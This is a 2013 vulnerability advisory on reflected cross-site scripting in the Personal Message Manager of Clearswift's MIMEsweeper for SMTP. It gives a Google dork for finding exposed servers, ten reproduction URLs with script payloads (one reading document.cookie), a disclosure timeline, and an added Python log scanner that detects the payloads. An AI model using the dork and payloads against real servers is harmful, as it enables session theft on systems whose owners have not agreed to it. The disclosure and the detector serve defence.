
MIMEsweeper For SMTP 5.5 Cross Site Scripting

Posted on 19 February 2013

Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor of evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor regarding the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave notice of public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested postponing the disclosure until after the patch is public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested a demo license to verify the fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date
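
[Added example: log check for the affected parameters]
The following is an added example, not part of the original advisory or of the vendor's code: a check that flags web access-log requests to the PMM pages listed above when one of the listed parameters carries HTML markup, including double percent-encoded markup. The combined-style log layout, the tag regex, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Pages and query parameters taken from the advisory's reproduction list.
PMM_PARAMS = {
    "reminder.aspx": {"email"},
    "newaccount.aspx": {"email", "ddlculture", "btncreateaccount", "btncancel"},
    "signin.aspx": {"tbemailaddress", "tbpassword", "cbautosignin", "btnsignin", "reason"},
}
# An opening or closing HTML tag; none of these fields should carry one.
TAG = re.compile(r"<\s*/?\s*[a-z!]", re.I)
# Assumed log layout: client address first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (such as %253C) up to a bounded depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_target):
    """Return the advisory-listed parameters whose value contains markup."""
    parts = urlsplit(request_target)
    path = parts.path.lower()
    if "/mswpmm/common/" not in path:
        return []
    watched = PMM_PARAMS.get(path.rsplit("/", 1)[-1], set())
    return sorted({name for name, value in parse_qsl(parts.query, keep_blank_values=True)
                   if name.lower() in watched and TAG.search(fully_decode(value))})

def scan_log(lines):
    """Return (client, request_target, parameters) for each flagged line."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if match and (params := suspicious_params(match.group(2))):
            findings.append((match.group(1), match.group(2), params))
    return findings

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2013:10:00:01 +0000] "GET /MSWPMM/Common/SignIn.aspx?reason=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [19/Feb/2013:10:00:05 +0000] "GET /MSWPMM/Common/SignIn.aspx?ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx HTTP/1.1" 200 5001',
    '192.0.2.12 - - [19/Feb/2013:10:00:09 +0000] "GET /MSWPMM/Common/NewAccount.aspx?email=a%40example.com&ddlCulture=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 6000',
]
```

Calling scan_log(SAMPLE_LOG) flags the first and third lines and leaves the ordinary ReturnUrl request alone. Values submitted in a POST body do not appear in access logs, so this only covers the query-string form shown in the reproduction list.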

 
